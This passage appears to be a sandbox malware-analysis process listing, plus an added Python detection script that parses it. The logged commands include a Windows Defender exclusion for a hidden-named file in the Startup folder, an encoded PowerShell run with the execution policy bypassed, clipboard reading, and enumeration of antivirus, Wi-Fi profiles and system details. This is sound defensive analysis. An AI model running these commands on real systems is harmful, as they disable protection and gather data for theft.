Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:01:19:20
Start date:05/01/2025
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff7c2f70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:01:19:21
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Imagebase:0x7ff7a7b90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:01:19:21
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:01:19:21
Start date:05/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
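
The records for Target IDs 37 and 39 show the sample adding a Windows Defender exclusion for a file named " .scr" (the name begins with a space) inside the all-users Startup folder, launched through cmd /c so the same action appears twice in the tree, after enumerating the GPU through WMI (Target IDs 33, 34, 36). The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses records in the key:value layout used on this page (the four embedded records are copied from the listing above and trimmed to the fields the rules need) and applies three command-line detection rules to them. The rule names, the finding layout and the cmd /c unwrapping are this example's own assumptions.

```python
"""Triage the process records above. Added example, not part of the Joe Sandbox
report or of the analysed sample: parses the key:value "Target ID" records and
runs command-line detection rules over them. Rule names, the finding layout and
the cmd /c unwrapping are this example's own assumptions."""
import re

# Constructed input: records copied from the listing above (Target IDs 36, 37,
# 39, 40), trimmed to the fields the rules use.
SAMPLE_RECORDS = r"""
Target ID:36
Path:C:\Windows\System32\wbem\WMIC.exe
Commandline:wmic path win32_VideoController get name
Has administrator privileges:true

Target ID:37
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Has administrator privileges:true

Target ID:39
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Has administrator privileges:true

Target ID:40
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Has administrator privileges:true
"""

# Rules (names are this example's own) applied to the unwrapped command line.
RULES = {
    "defender_exclusion": re.compile(
        r"\bAdd-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I),
    "hardware_discovery_wmi": re.compile(
        r"\bwmic\b.*\bwin32_(?:VideoController|NetworkAdapter|ComputerSystem|BIOS)\b", re.I),
    "process_discovery": re.compile(r"\btasklist\b", re.I),
}
# cmd.exe /c "<inner>" wrapper: the cmd parent and its child collapse to one key.
CMD_WRAPPER = re.compile(r'^(?:"?[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/c\s+"(.*)"\s*$', re.I)
EXCLUSION_ARG = re.compile(r"-ExclusionPath\s+'([^']+)'", re.I)
AUTOSTART_MARKER = "\\start menu\\programs\\startup\\"


def parse_records(text):
    """Blank-line separated records; split each line on the first ':' only,
    since values (drive letters, times) contain colons themselves."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    return records + [current] if current else records


def inner_command(cmdline):
    m = CMD_WRAPPER.match(cmdline.strip())
    return m.group(1) if m else cmdline.strip()


def analyse_exclusion(cmd):
    """For Add-MpPreference -ExclusionPath: does the excluded path sit in a
    Startup folder, and does the file name begin with whitespace (' .scr')?"""
    m = EXCLUSION_ARG.search(cmd)
    if not m:
        return None
    path = m.group(1)
    name = path.rsplit("\\", 1)[-1]
    return {"path": path,
            "covers_autostart": AUTOSTART_MARKER in path.lower(),
            "leading_space_name": name != name.lstrip()}


def triage(text):
    findings = []
    for rec in parse_records(text):
        cmd = inner_command(rec.get("Commandline", ""))
        hits = [name for name, rx in RULES.items() if rx.search(cmd)]
        if not hits:
            continue
        finding = {"target": rec.get("Target ID"), "command": cmd, "rules": hits,
                   "admin": rec.get("Has administrator privileges") == "true"}
        exclusion = analyse_exclusion(cmd)
        if exclusion:
            finding["exclusion"] = exclusion
        findings.append(finding)
    return findings


def collapse(findings):
    """Group by unwrapped command: the cmd /c parent (37) and the powershell
    child (39) are one action, not two separate exclusion events."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["command"], []).append(f["target"])
    return grouped


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f["target"], f["rules"], f.get("exclusion", ""))
```

Run it as a script to print the findings, or import triage() and feed it a pasted process listing from another report. Collapsing by the unwrapped command keeps the cmd /c parent and its PowerShell child from being counted as two exclusion events; the covers_autostart flag is the one worth alerting on, since an exclusion on a Startup folder whitelists whatever is dropped there next, and a file name that starts with a space is easy to miss in a directory listing.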

Target ID:40
Start time:01:19:22
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff7a7b90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:01:19:22
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:01:19:22
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff7a7b90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff6c6d10000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 01:19:22
Start date: 05/01/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase: 0x7ff7c2f70000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 01:19:22
Start date: 05/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-Clipboard
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 53
Start time: 01:19:22
Start date: 05/01/2025
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff6c6d10000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 54
Start time: 01:19:22
Start date: 05/01/2025
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff6c6d10000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 56
Start time: 01:19:24
Start date: 05/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x7ff7a7b90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 57
Start time: 01:19:24
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 58
Start time: 01:19:24
Start date: 05/01/2025
Path: C:\Windows\System32\tree.com
Wow64 process (32bit): false
Commandline: tree /A /F
Imagebase: 0x7ff6bd590000
File size: 20'992 bytes
MD5 hash: 9EB969EF56718A6243BF60350CD065F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 59
Start time: 01:19:24
Start date: 05/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase: 0x7ff7a7b90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 01:19:24
Start date: 05/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase: 0x7ff7a7b90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 61
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:systeminfo
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7182c0000
                                                                                                                                                                                                                                                                  File size:110'080 bytes
                                                                                                                                                                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:netsh wlan show profile
                                                                                                                                                                                                                                                                  Imagebase:0x7ff67c6c0000
                                                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:01:19:25
Start date:05/01/2025
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6bd590000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:01:19:25
Start date:05/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:01:19:26
Start date:05/01/2025
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
Imagebase:0x7ff6b1ef0000
File size:2'759'232 bytes
MD5 hash:F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:01:19:27
Start date:05/01/2025
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP"
Imagebase:0x7ff7951e0000
File size:52'744 bytes
MD5 hash:C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:01:19:27
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff7a7b90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:01:19:27
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:0x7ff7a7b90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:75
Start time:01:19:28
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:76
Start time:01:19:28
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:77
Start time:01:19:28
Start date:05/01/2025
Path:C:\Windows\System32\getmac.exe
Wow64 process (32bit):false
Commandline:getmac
Imagebase:0x7ff635830000
File size:90'112 bytes
MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:78
                                                                                                                                                                                                                                                                  Start time:01:19:28
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6bd590000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:79
                                                                                                                                                                                                                                                                  Start time:02:36:05
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:80
                                                                                                                                                                                                                                                                  Start time:02:36:05
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
